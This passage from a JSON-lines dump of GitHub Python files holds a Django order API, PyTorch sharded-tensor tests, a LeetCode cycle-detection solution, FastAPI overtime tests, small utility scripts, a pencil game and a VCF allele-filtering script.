orders.filter(**params)\r\n\t\tif source_value == 1:\r\n\t\t\tsource = 'weizoom_mall'\r\n\t\telif source_value == 0:\r\n\t\t\tsource = 'mine_mall'\r\n\t###################################################\r\n\t# if user.is_weizoom_mall:\r\n\t# \tweizoom_mall_order_ids = WeizoomMallHasOtherMallProductOrder.get_orders_weizoom_mall_for_other_mall(webapp_id)\r\n\t# else:\r\n\t# \tweizoom_mall_order_ids = WeizoomMallHasOtherMallProductOrder.get_order_ids_for(webapp_id)\r\n\r\n\tweizoom_orders = Order.by_webapp_id(webapp_id).filter(order_source=ORDER_SOURCE_WEISHOP)\r\n\tweizoom_mall_order_ids = [order.id for order in weizoom_orders]\r\n\r\n\torder_id_list = []\r\n\tif source:\r\n\t\tfor order in orders:\r\n\t\t\tif weizoom_mall_order_ids:\r\n\t\t\t\tif order.order_id in weizoom_mall_order_ids:\r\n\t\t\t\t\tif user.is_weizoom_mall:\r\n\t\t\t\t\t\torder.come = 'weizoom_mall'\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\torder.come = 'weizoom_mall'\r\n\t\t\t\telse:\r\n\t\t\t\t\torder.come = 'mine_mall'\r\n\t\t\telse:\r\n\t\t\t\torder.come = 'mine_mall'\r\n\t\t\tif source and order.come != source:\r\n\t\t\t\tcontinue\r\n\t\t\torder_id_list.append(order.id)\r\n\r\n\tif order_id_list:\r\n\t\torders = orders.filter(id__in=order_id_list)\r\n\t###################################################\r\n\t# Handle sorting\r\n\tif sort_attr != 'created_at':\r\n\t\torders = orders.order_by(sort_attr)\r\n\t###################################################\r\n\t# Paginate\r\n\tpageinfo, orders = paginator.paginate(orders, cur_page, count_per_page, query_string=query_string)\r\n\r\n\t# Get the member for each order\r\n\twebapp_user_ids = set([order.webapp_user_id for order in orders])\r\n\twebappuser2member = Member.members_from_webapp_user_ids(webapp_user_ids)\r\n\r\n\t# Get the product count for each order\r\n\torder_ids = [order.id for order in orders]\r\n\r\n\torder2productcount = {}\r\n\tfor relation in OrderHasProduct.objects.filter(order_id__in=order_ids):\r\n\t\torder_id = relation.order_id\r\n\t\tif order_id in order2productcount:\r\n\t\t\torder2productcount[order_id] = order2productcount[order_id] + 1\r\n\t\telse:\r\n\t\t\torder2productcount[order_id] = 1\r\n\r\n\t# Build the order data to return\r\n\titems = 
[]\r\n\ttoday = datetime.today()\r\n\r\n\tfor order in orders:\r\n\t\t# Get the display name of the member for this order\r\n\t\tmember = webappuser2member.get(order.webapp_user_id, None)\r\n\t\tif member:\r\n\t\t\torder.buyer_name = member.username_for_html\r\n\t\t\torder.member_id = member.id\r\n\t\telse:\r\n\t\t\torder.buyer_name = u'未知'\r\n\t\t\torder.member_id = 0\r\n\r\n\t\tpayment_time = None\r\n\r\n\t\tif order.payment_time is None:\r\n\t\t\tpayment_time = ''\r\n\t\telif __data_format(order.payment_time) == DEFAULT_CREATE_TIME:\r\n\t\t\tpayment_time = ''\r\n\t\telse:\r\n\t\t\tpayment_time = __data_format(order.payment_time)\r\n\r\n\t\tif weizoom_mall_order_ids:\r\n\t\t\tif order.order_id in weizoom_mall_order_ids:\r\n\t\t\t\tif user.is_weizoom_mall:\r\n\t\t\t\t\torder.come = 'weizoom_mall'\r\n\t\t\t\telse:\r\n\t\t\t\t\torder.come = 'weizoom_mall'\r\n\t\t\telse:\r\n\t\t\t\torder.come = 'mine_mall'\r\n\t\telse:\r\n\t\t\torder.come = 'mine_mall'\r\n\t\tif source and order.come != source:\r\n\t\t\tcontinue\r\n\r\n\t\t# liupeiyu: whether the member in this order is clickable\r\n\t\t# For orders from this shop, the member is not clickable\r\n\t\t# If the user is Weizoom Mall, the member is always clickable\r\n\t\tif order.come == 'weizoom_mall' and user.is_weizoom_mall is False:\r\n\t\t\torder.member_id = 0\r\n\r\n\t\torder_id_list.append(order.id)\r\n\t\titems.append({\r\n\t\t\t'id': order.id,\r\n\t\t\t'order_id': order.order_id,\r\n\t\t\t'status': get_order_status_text(order.status),\r\n\t\t\t'total_price': '%.2f' % order.final_price,\r\n\t\t\t'ship_name': order.ship_name,\r\n\t\t\t'buyer_name': order.buyer_name,\r\n\t\t\t'pay_interface_name': PAYTYPE2NAME.get(order.pay_interface_type, u''),\r\n\t\t\t'created_at': __data_format(order.created_at),\r\n\t\t\t'product_count': order2productcount.get(order.id, 0),\r\n\t\t\t'customer_message': order.customer_message,\r\n\t\t\t'payment_time': payment_time,\r\n\t\t\t'come': order.come,\r\n\t\t\t'member_id': order.member_id,\r\n\t\t\t'type': order.type,\r\n\t\t\t'reason': order.reason\r\n\t\t})\r\n\treturn items, pageinfo\r\n\r\n#===============================================================================\r\n# get_order_list: get the order list\r\n#===============================================================================\r\ndef get_order_list(request):\r\n\r\n\t# Handle search by order id\r\n\tquery = request.GET.get('query', None).strip()\r\n\r\n\t# Handle filtering by order status\r\n\tfilter_value = request.GET.get('filter_value', '-1')\r\n\r\n\t# Paginate\r\n\tcur_page = int(request.GET.get('cur_page', '1'))\r\n\tcount_per_page = int(request.GET.get('count', '10'))\r\n\r\n\tuser = request.user\r\n\tquery_string = request.META['QUERY_STRING']\r\n\tsort_attr = \"-created_at\"\r\n\r\n\titems, pageinfo = _get_order_items(user, query, filter_value, sort_attr, query_string, count_per_page, cur_page)\r\n\tif not items:\r\n\t\tresponse = create_response(500)\r\n\t\tresponse.errMsg = u'没有订单'\r\n\t\treturn response.get_jsonp_response(request)\r\n\tpage_json = JsonResponse()\r\n\tpage_json.has_next = paginator.to_dict(pageinfo)['has_next']\r\n\r\n\texisted_pay_interfaces = mall_api.get_pay_interfaces_by_user(user)\r\n\r\n\tis_weizoom_mall_partner = AccountHasWeizoomCardPermissions.is_can_use_weizoom_card_by_owner_id(request.user.id)\r\n\tif request.user.is_weizoom_mall:\r\n\t\tis_weizoom_mall_partner = False\r\n\tif is_weizoom_mall_partner or request.user.is_weizoom_mall:\r\n\t\tis_show_source = True\r\n\telse:\r\n\t\tis_show_source = False\r\n\tresponse = create_response(200)\r\n\tresponse.data = {\r\n\t\t'orders': items,\r\n\t\t'page_info': paginator.to_dict(pageinfo),\r\n\t\t'is_show_source': is_show_source,\r\n\t\t'existed_pay_interfaces': 
existed_pay_interfaces,\r\n\t}\r\n\treturn response.get_jsonp_response(request)\r\n\r\n\r\n#===============================================================================\r\n# get_order: get order details\r\n#===============================================================================\r\ndef get_order(request):\r\n\tid = request.GET.get('id')\r\n\torder = Order.objects.get(id=id)\r\n\torder_has_products = OrderHasProduct.objects.filter(order=order)\r\n\r\n\tnumber = 0\r\n\tcur_order = JsonResponse()\r\n\tfor order_has_product in order_has_products:\r\n\t\tnumber += order_has_product.number\r\n\r\n\tcur_order.number = number\r\n\tcur_order.statu = get_order_status_text(order.status)\r\n\tcur_order.express_company_name = get_name_by_value(order.express_company_name)\r\n\tcur_order.type = order.type\r\n\tcur_order.express_number = order.express_number\r\n\tcur_order.leader_name = order.leader_name\r\n\tcur_order.integral = order.integral\r\n\tcur_order.bill_type = order.bill_type\r\n\tcur_order.bill = order.bill\r\n\tcur_order.order_id = order.order_id\r\n\tcur_order.final_price = '%.2f' % order.final_price\r\n\tcur_order.postage = '%.2f' % order.postage\r\n\tcur_order.ship_name = order.ship_name\r\n\tcur_order.ship_tel = order.ship_tel\r\n\tcur_order.area = regional_util.get_str_value_by_string_ids(order.area)\r\n\tcur_order.ship_address = order.ship_address\r\n\tcur_order.customer_message = order.customer_message\r\n\tcur_order.created_at = __data_format(order.created_at)\r\n\tcur_order.action = get_order_actions(order)\r\n\tcur_order.reason = order.reason\r\n\t# Associated coupon\r\n\tcoupon = order.get_coupon()\r\n\tif coupon:\r\n\t\tcur_coupon = JsonResponse()\r\n\t\tcur_coupon.coupon_id = coupon.coupon_id\r\n\t\tcur_coupon.coupon_rule_name = coupon.coupon_rule.name\r\n\t\tcur_coupon.money = str(coupon.money)\r\n\t\tcur_order.coupon = cur_coupon\r\n\telse:\r\n\t\tcur_order.coupon = None\r\n\r\n\r\n\r\n\tproducts = mall_api.get_order_products(order)\r\n\t# Products\r\n\tcur_product_json = []\r\n\tfor product in products:\r\n\t\tcur_product = JsonResponse()\r\n\t\tcur_product.name = product['name']\r\n\t\tcur_product.count = product['count']\r\n\t\tcur_product.total_price = product['total_price']\r\n\t\tcur_product.thumbnails_url = product['thumbnails_url']\r\n\t\tcur_product.is_deleted = product['is_deleted']\r\n\t\tproperties = product['custom_model_properties']\r\n\t\tif properties:\r\n\t\t\tfor product_property in properties:\r\n\t\t\t\tcur_product.property_name = product_property['name']\r\n\t\t\t\tcur_product.property_value = product_property['property_value']\r\n\r\n\t\tcur_product_json.append(cur_product)\r\n\r\n\tresponse = create_response(200)\r\n\tresponse.data.order = cur_order\r\n\tresponse.data.products = cur_product_json\r\n\treturn response.get_jsonp_response(request)\r\n\r\n\r\n########################################################################\r\n# get_order_express_name: get express company names\r\n########################################################################\r\ndef get_order_express_name(request):\r\n\texpress_name = util.get_express_company_json()\r\n\tresponse = create_response(200)\r\n\tresponse.data = express_name\r\n\treturn response.get_jsonp_response(request)\r\n\r\n\r\n########################################################################\r\n# add_express_info: add shipping information\r\n########################################################################\r\ndef add_express_info(request):\r\n\torder_id = request.GET['order_id']\r\n\texpress_company_name = 
request.GET['express_company_name']\r\n\texpress_number = request.GET['express_number']\r\n\tleader_name = request.GET['leader_name']\r\n\tis_update_express = request.GET['is_update_express']\r\n\tis_update_express = True if is_update_express == 'true' else False\r\n\tmall_api.ship_order(order_id, express_company_name, express_number, request.user.username, leader_name=leader_name, is_update_express=is_update_express)\r\n\r\n\tresponse = create_response(200)\r\n\tresponse.data.message = u'成功'\r\n\treturn response.get_jsonp_response(request)\r\n\r\n########################################################################\r\n# update_order_status: update order status\r\n########################################################################\r\ndef update_order_status(request):\r\n\torder_id = request.GET['order_id']\r\n\taction = request.GET['action']\r\n\torder = Order.objects.get(id=order_id)\r\n\r\n\tmall_api.update_order_status(request.user, action, order, request)\r\n\r\n\tresponse = create_response(200)\r\n\tresponse.data.message = u'成功'\r\n\treturn response.get_jsonp_response(request)","repo_name":"chengdg/weizoom","sub_path":"weapp/mobile_app/order_api_views.py","file_name":"order_api_views.py","file_ext":"py","file_size_in_byte":11743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"14820877109","text":"# Owner(s): [\"oncall: distributed\"]\n\nimport copy\n\nimport torch\nimport torch.distributed._shard.sharded_tensor as sharded_tensor\n\nfrom torch.distributed._shard.sharding_spec import (\n    ChunkShardingSpec,\n)\nfrom torch.testing._internal.common_distributed import (\n    requires_nccl,\n    skip_if_lt_x_gpu,\n)\n\nfrom torch.testing._internal.distributed._shard.sharded_tensor import (\n    TEST_GPU_NUM,\n    ShardedTensorTestBase,\n    with_comms,\n)\nfrom torch.testing._internal.common_utils import (\n    run_tests,\n)\n\n\nclass TestTensorOps(ShardedTensorTestBase):\n    @with_comms(init_rpc=False)\n    @skip_if_lt_x_gpu(TEST_GPU_NUM)\n    @requires_nccl()\n    def test_deep_copy(self):\n        spec = ChunkShardingSpec(\n            dim=0,\n            placements=[\n                \"rank:0/cuda:0\",\n                \"rank:1/cuda:1\",\n                \"rank:2/cuda:2\",\n                \"rank:3/cuda:3\",\n            ],\n        )\n        st = sharded_tensor.rand(spec, (12, 5))\n        copied_st = copy.deepcopy(st)\n        self.assertTrue(type(copied_st) is type(st))\n        self.assertEqual(copied_st.local_tensor(), st.local_tensor())\n        self.assertFalse(copied_st is st)\n\n    @with_comms(init_rpc=False)\n    @skip_if_lt_x_gpu(TEST_GPU_NUM)\n    @requires_nccl()\n    def test_inplace_copy(self):\n        spec = ChunkShardingSpec(\n            dim=0,\n            placements=[\n                \"rank:0/cuda:0\",\n                \"rank:1/cuda:1\",\n                \"rank:2/cuda:2\",\n                \"rank:3/cuda:3\",\n            ],\n        )\n        st = sharded_tensor.rand(spec, (12, 5))\n        ones_st = sharded_tensor.ones(spec, (12, 5))\n        self.assertFalse(torch.equal(ones_st, st))\n        st.copy_(ones_st)\n        self.assertTrue(torch.equal(st, ones_st))\n\n        # no grad inplace_copy should work between two tensors with different requires_grad\n        st_with_grad = sharded_tensor.rand(spec, (12, 5), requires_grad=True)\n        self.assertTrue(st_with_grad.requires_grad)\n        self.assertFalse(ones_st.requires_grad)\n        with torch.no_grad():\n            st_with_grad.copy_(ones_st)\n        self.assertEqual(st_with_grad.local_tensor(), ones_st.local_tensor())\n\n    @with_comms(init_rpc=False)\n    @skip_if_lt_x_gpu(TEST_GPU_NUM)\n    @requires_nccl()\n    def test_clone(self):\n        spec = ChunkShardingSpec(\n            dim=0,\n            placements=[\n                \"rank:0/cuda:0\",\n                \"rank:1/cuda:1\",\n                \"rank:2/cuda:2\",\n                \"rank:3/cuda:3\",\n            ],\n        )\n        st = sharded_tensor.rand(spec, (12, 5))\n        copied_st = 
st.clone()\n        self.assertTrue(type(copied_st) is type(st))\n        self.assertEqual(copied_st.local_tensor(), st.local_tensor())\n        self.assertFalse(copied_st is st)\n\n    @with_comms(init_rpc=False)\n    @skip_if_lt_x_gpu(TEST_GPU_NUM)\n    @requires_nccl()\n    def test_detach(self):\n        spec = ChunkShardingSpec(\n            dim=0,\n            placements=[\n                \"rank:0/cuda:0\",\n                \"rank:1/cuda:1\",\n                \"rank:2/cuda:2\",\n                \"rank:3/cuda:3\",\n            ],\n        )\n        st = sharded_tensor.rand(spec, (12, 5), requires_grad=True)\n        local_shards = st.local_shards()\n        # st was created with requires_grad=True, so all local shards require grads\n        for local_shard in local_shards:\n            self.assertTrue(local_shard.tensor.requires_grad)\n\n        detached_st = st.detach()\n        self.assertFalse(detached_st.requires_grad)\n\n        for local_shard in detached_st.local_shards():\n            self.assertFalse(local_shard.tensor.requires_grad)\n\n    @with_comms(init_rpc=False)\n    @skip_if_lt_x_gpu(TEST_GPU_NUM)\n    @requires_nccl()\n    def test_set_requires_grad(self):\n        spec = ChunkShardingSpec(\n            dim=0,\n            placements=[\n                \"rank:0/cuda:0\",\n                \"rank:1/cuda:1\",\n                \"rank:2/cuda:2\",\n                \"rank:3/cuda:3\",\n            ],\n        )\n        st = sharded_tensor.rand(spec, (12, 5))\n        local_shards = st.local_shards()\n        # before set requires_grad, all local shards should not require grads\n        for local_shard in local_shards:\n            self.assertFalse(local_shard.tensor.requires_grad)\n\n        st.requires_grad_()\n        self.assertTrue(st.requires_grad)\n\n        for local_shard in local_shards:\n            self.assertTrue(local_shard.tensor.requires_grad)\n\n\nif __name__ == \"__main__\":\n    run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/distributed/_shard/sharded_tensor/ops/test_tensor_ops.py","file_name":"test_tensor_ops.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"}
{"seq_id":"17628707087","text":"'''\nGiven head, the head of a linked list, determine if the linked list has a cycle in it.\n\nThere is a cycle in a linked list if there is some node in the list that can be reached again by continuously following the next pointer. \nInternally, pos is used to denote the index of the node that tail's next pointer is connected to. Note that pos is not passed as a parameter.\n\nReturn true if there is a cycle in the linked list. 
Otherwise, return false.\n'''\n\nfrom typing import Optional\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x, next=None):\n self.val = x\n self.next = next\n\nclass Solution:\n def hasCycle(self, head: Optional[ListNode]) -> bool:\n if not head:\n return False\n h1 = head.next\n h2 = head\n while h1:\n if h1.next == h2 or h1.next == h1:\n return True\n h2 = h2.next\n if h2 == h1:\n h1 = h1.next\n h2 = head\n \n return False\n \n def hasCycle2(self, head: Optional[ListNode]) -> bool:\n fast = head\n slow = head\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n\n return False\n\nsolution = Solution()\nhead = ListNode(-1, ListNode(-7, ListNode(7, ListNode(-4, ListNode(19, ListNode(6, ListNode(-9, ListNode(-5, ListNode(-2, ListNode(-5))))))))))\ncur = head\nwhile cur.next:\n cur = cur.next\ncur.next = cur\n\nprint(solution.hasCycle2(head))\n","repo_name":"BoTWGitHub/LeecodePractice","sub_path":"python/LeetCode Quiz/No141.py","file_name":"No141.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26011952210","text":"from fastapi.testclient import TestClient\nfrom fastapi.security import OAuth2PasswordRequestForm\nfrom fastapi import Depends\nfrom sqlalchemy.orm import Session\n\nfrom attendance.main import app, login\nfrom attendance import crud\nfrom attendance.database import get_db\nimport json\n\nclient = TestClient(app)\n\nasync def override_dependency(form_data: OAuth2PasswordRequestForm= Depends(), db:Session=Depends(get_db)):\n user_dict = crud.authenticate_user(db, account=form_data.username, passwd=form_data.password)\n return {\"access_token\": user_dict.account, \"token_type\": \"bearer\"}\n\napp.dependency_overrides[login] = override_dependency\n\nofficer = {\"accept\": \"application/json\", \"Authorization\": \"Bearer officer1\", \"Content-Type\": \"application/json\"}\nmanager = {\"accept\": \"application/json\", \"Authorization\": \"Bearer manager1\", \"Content-Type\": \"application/json\"}\nhr = {\"accept\": \"application/json\", \"Authorization\": \"Bearer hr1\", \"Content-Type\": \"application/json\"}\nhr_manager = {\"accept\": \"application/json\", \"Authorization\": \"Bearer hrmanager1\", \"Content-Type\": \"application/json\"}\nboss = {\"accept\": \"application/json\", \"Authorization\": \"Bearer boss1\", \"Content-Type\": \"application/json\"}\n\ndef test_put_overtime_officer():\n overtime = {\n 'day': '2021-08-07',\n 'start': '13:00',\n 'end': '17:00',\n 'reason': '加班時間並不會處理私事'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/1\", data=overtime_json, headers=officer)\n print(response.json())\n assert response.status_code == 200\n\ndef test_put_overtime_wronguser():\n overtime = {\n 'day': '2021-08-07',\n 'start': '13:00',\n 'end': '17:00',\n 'reason': '假日被迫工程掠地'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/1\", data=overtime_json, headers=manager)\n assert response.status_code == 401\n assert response.json() == {\n \"detail\": \"Wrong User.\"\n }\n\ndef test_put_overtime_wrongtime():\n overtime = {\n 'day': '2021-08-08',\n 'start': '17:00',\n 'end': '19:00',\n 'reason': '錯誤的開始'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/1\", data=overtime_json, headers=officer)\n assert response.status_code == 400\n assert response.json() == {\n \"detail\": \"Wrong start time.\"\n }\n\ndef 
test_put_overtime_wrongtime2():\n overtime = {\n 'day': '2021-08-02',\n 'start': '17:00',\n 'end': '19:00',\n 'reason': 'P.H.'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/1\", data=overtime_json, headers=officer)\n assert response.status_code == 400\n assert response.json() == {\n \"detail\": \"Wrong start time.\"\n }\n\ndef test_put_overtime_wrongtime3():\n overtime = {\n 'day': '2021-08-01',\n 'start': '13:00',\n 'end': '08:00',\n 'reason': '圓周率之花'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/3\", data=overtime_json, headers=hr)\n assert response.status_code == 400\n assert response.json() == {\n \"detail\": \"Wrong time.\"\n }\n\ndef test_put_overtime_notfound():\n overtime = {\n 'day': '2021-08-01',\n 'start': '13:00',\n 'end': '17:00',\n 'reason': '圓周率之花'\n }\n overtime_json = json.dumps(overtime)\n response = client.put(\"/overtime/20\", data=overtime_json, headers=hr)\n assert response.status_code == 404\n assert response.json() == {\n \"detail\": \"Overtime not found.\"\n }","repo_name":"auyu0408/attendance_backend","sub_path":"tests/test_overtime_put.py","file_name":"test_overtime_put.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72354777513","text":"from databasecon import *\nimport csv, cx_Oracle\nfrom StockPortfolioConst import *\ndef fetchCapName(stCode):\n cur=dbconnect()\n cur.execute(const.STOCKMARKETCAP%stCode)\n record=cur.fetchall()\n return record[0][0]\n\ndef marketCapMaster(marketCapAmount):\n try:\n cur = dbconnect()\n cur.execute(const.MARKETCAP%(marketCapAmount))\n records=cur.fetchall()\n for column in records:\n capName = column[0]\n return capName\n\n\n except cx_Oracle.DatabaseError as db:\n print(\"Error in Database\",db)\ndef getSectorAndStockInfo(stockCode):\n cur=dbconnect()\n cur.execute(const.GETALL%stockCode)\n records = cur.fetchall()\n return records[0]","repo_name":"manasnayak/StockPortfolio","sub_path":"StockReader.py","file_name":"StockReader.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24571037479","text":"__description__ = '''\n 用来封装windows执行dos命令,分两种,一种是收集执行结果,一种是不需要收集执行结果\n '''\n\n\nimport os\nimport subprocess\nfrom tools.logger import logger\n\n\nclass DocCmd:\n\n\n @staticmethod\n def execute_cmd_result(command):\n '''\n 执行command命令,并返回执行结果\n :param command: 传入要执行的命令,字符串格式\n :return:返回执行结果,列表格式\n '''\n result_list = []\n result = os.popen(command).readlines()\n for i in result:\n if i == '\\n':\n continue\n result_list.append(i.strip('\\n')) # strip() 方法用于移除字符串头尾指定的字符\n return result_list\n\n @staticmethod\n def execute_bat(batfile):\n \"\"\"\n :function:执行批处理文件\n :param batfile: .bat路径\n \"\"\"\n logger.debug(f'Prepare to execute bat file : {batfile}')\n popen_obj = subprocess.Popen(batfile, shell=True, stdout=subprocess.PIPE)\n stdout, stderr = popen_obj.communicate()\n if popen_obj.returncode == 0:\n logger.debug(f'Success to execute bat file!')\n else:\n logger.error(f'Fail to execute bat file!')\n\n @staticmethod\n def execute_cmd(command):\n '''\n 仅执行command命令,不收集执行结果\n :param command: 传入要执行的命令,字符串格式\n '''\n logger.info(f\"Launching system order:{command}.\")\n 
os.system(command)\n","repo_name":"Zhangwenke-git/execution-engine","sub_path":"tools/doc_cmd.py","file_name":"doc_cmd.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20623839261","text":"from errors import errors\nfrom bot import bot_make_move\n\nplayers = ('John', 'Jack')\n\n\ndef pencil_number():\n print('How many pencils would you like to use:')\n while True:\n try:\n num = int(input())\n if num < 0:\n raise ValueError\n except ValueError:\n print(errors[0])\n else:\n if num == 0:\n print(errors[1])\n continue\n return num\n\n\ndef first_player():\n print('Who will be the first ({}, {} ):'.format(players[0], players[1]))\n while True:\n name = input()\n if name not in players:\n print(errors[2].format(players[0], players[1]))\n continue\n return name\n\n\ndef output():\n print('|' * pencils)\n\n\ndef determine_first_turn(f_player):\n first = f_player\n if f_player == players[0]:\n second = players[1]\n else:\n second = players[0]\n return first, second\n\n\ndef make_move(turn):\n global pencils\n if turn == 'Jack':\n num_of_pencils = bot_make_move(turn, pencils)\n return num_of_pencils\n print(turn + \"'s turn:\")\n while True:\n try:\n num_of_pencils = int(input())\n if num_of_pencils <= 0 or num_of_pencils > 3:\n raise ValueError\n except ValueError:\n print(errors[3])\n else:\n return num_of_pencils\n\n\ndef choose_turn(turn, first, second):\n if turn == first:\n turn = second\n else:\n turn = first\n return turn\n\n\ndef gameplay(f_player):\n global pencils\n first, second = determine_first_turn(f_player=f_player)\n turn = first\n while pencils > 0:\n output()\n delete_pencils = make_move(turn=turn)\n if delete_pencils > pencils:\n print(errors[4])\n continue\n pencils -= delete_pencils\n turn = choose_turn(turn=turn,\n first=first,\n second=second)\n print(f'{turn} won!')\n\n\ndef main():\n global pencils\n pencils = pencil_number()\n f_player = first_player()\n gameplay(f_player=f_player)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JustLucifer/JBA_projects","sub_path":"Python/Last Pencil/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3683392100","text":"__author__ = 'prabhanjan'\n\nfrom seamcarving_ca3 import SeamCarving\n\n\ndef main():\n img1 = SeamCarving(\"asu.png\")\n img1.resize_image_to(1)\n\n img2 = SeamCarving(\"HJoceanSmall.png\")\n img2.resize_image_to(60)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"prabhanjan2906/my-python-codes","sub_path":"seamcarving_main_ca3.py","file_name":"seamcarving_main_ca3.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39887405294","text":"from cyvcf2 import VCF\nimport argparse\nimport sys\nimport numpy as np\nimport subprocess\n\n\ndef create_allele_count_dictionary(variant):\n \"\"\"Create a dictionary with the allele count per allele\"\"\"\n\n # Dictionary that stores the count per allele\n allele_count_dictionary = {}\n\n # Determine the reference allele count\n total_number_of_alleles = variant.INFO[\"AN\"]\n total_number_of_alternative_alleles = sum(wrap_in_list(variant.INFO[\"AC\"]))\n reference_allele_count = total_number_of_alleles - total_number_of_alternative_alleles\n allele_count_dictionary[variant.REF] = reference_allele_count\n\n # add counts of the 
alternative alleles to the allele count dictionary\n # loop over the alternative alleles, lookup the allele count from the AC attribute and add dictionary entry\n alternative_allele_index = 0\n for alternative_allele in variant.ALT:\n allele_count_dictionary[alternative_allele] = wrap_in_list(variant.INFO[\"AC\"])[alternative_allele_index]\n alternative_allele_index += 1\n\n return allele_count_dictionary\n\n\ndef determine_minor_allele(allele_count_dictionary):\n \"\"\"Determine the minor (least frequent) allele.\n If there are multiple alleles with the same lowest count\n then one of these alleles is chosen at random based on position in the dictionary loop.\n There is no way to choose 1 minor allele over the other\"\"\"\n\n minor_allele = None\n\n # Loop over all alleles and their counts\n for allele, allele_count in allele_count_dictionary.items():\n\n # Set the minor allele if:\n # A) minor allele is none\n # B) allele count of current allele is smaller than the allele count for previous determined minor allele\n if not minor_allele or allele_count < allele_count_dictionary[minor_allele]:\n minor_allele = allele\n\n return minor_allele\n\n\ndef determine_major_allele(allele_count_dictionary):\n \"\"\"Determine the major (most frequent) allele.\n If there are multiple alleles with the same highest count\n then one of these alleles is chosen at random based on position in the dictionary loop.\n There is no way to choose 1 major allele over the other\"\"\"\n\n major_allele = None\n\n # Loop over all alleles and their counts\n for allele, allele_count in allele_count_dictionary.items():\n\n # Set the major allele if:\n # A) major allele is none\n # B) allele count of current allele is higher than the allele count for previous determined major allele\n if not major_allele or allele_count > allele_count_dictionary[major_allele]:\n major_allele = allele\n\n return major_allele\n\n\ndef determine_non_major_alleles(allele_count_dictionary):\n \"\"\"Determine the non-major allele(s).\n All alleles that are not the major allele are returned\"\"\"\n\n major_allele = determine_major_allele(allele_count_dictionary)\n major_allele_set = {major_allele, }\n non_major_allele = set(allele_count_dictionary.keys()) - major_allele_set\n \n return non_major_allele\n\ndef determine_alleles_of_interest(variant, allele_type):\n \"\"\"Determine the allele(s) of interest based on the allele type provided in the CLI\"\"\"\n\n alleles_of_interest = None\n\n # Create a dictionary with the allele count for all alleles\n allele_count_dictionary = create_allele_count_dictionary(variant)\n\n # If the allele type is non-reference, the alleles of interest are all alternative (non-reference) alleles\n if allele_type == \"nref\":\n alleles_of_interest = variant.ALT\n # If the allele type is alt1, the allele of interest is the 1st alternative allele (kept in a list)\n if allele_type == \"alt1\":\n alleles_of_interest = [variant.ALT[0]]\n # If the allele type is minor, the allele of interest is the least frequent allele (kept in a list so multi-base alleles are not split into characters)\n if allele_type == \"minor\":\n alleles_of_interest = [determine_minor_allele(allele_count_dictionary)]\n # If the allele type is major, the allele of interest is the most frequent allele (kept in a list so multi-base alleles are not split into characters)\n if allele_type == \"major\":\n alleles_of_interest = [determine_major_allele(allele_count_dictionary)]\n # If the allele type is non-major, the alleles of interest are all alleles except the major allele\n if allele_type == \"nonmajor\":\n alleles_of_interest = list(determine_non_major_alleles(allele_count_dictionary))\n\n return 
alleles_of_interest\n\n\ndef samples_required_pass(variant, samples_required_boolean_index, alleles_of_interest, het_or_hom):\n \"\"\"Return True if the samples that are required to be heterozygous or homozygous are indeed heterozygous or homozygous.\n If any of the required samples is missing return False.\n\n The het_or_hom arguments specifies if this function check that the required samples are heterozygous or homozygous.\n The alleles_of_interest specifies the allele for which the required samples should be heterozygous or homozygous.\n\n If there are multiple alleles of interest (for multi-allelic variants and allele type non-reference or non-major)\n the required samples can be heterozygous or homozygous for any of those alleles for this function to return True.\"\"\"\n\n # Number of unique alleles expected\n if het_or_hom == \"het\":\n expected_nr_unique_alleles = 2\n else:\n expected_nr_unique_alleles = 1\n\n # Get the genotypes of the required samples by applying boolean index\n genotypes_samples_of_interest = variant.gt_bases[samples_required_boolean_index]\n\n # Return False if a genotype is missing\n if any(is_missing_genotype(gt) for gt in genotypes_samples_of_interest):\n return False\n\n # Count how many of the required samples have the allele of interest in the desired het or hom state\n number_of_genotypes_match_desired_state = 0\n\n # Loop over the genotypes that should be het or hom with an allele of interest\n for genotype in genotypes_samples_of_interest:\n\n # Check that the genotype\n # A) matches the desired heterozygous or homozygous genotype state\n # (by checking the length of the set of unique alleles of the genotype (het=2, hom=1))\n # B) the genotype allele set contains at least 1 of the alleles of interest.\n # Alleles of interest can be nref, or nonmajor, which can be multiple alleles. (e.g. 
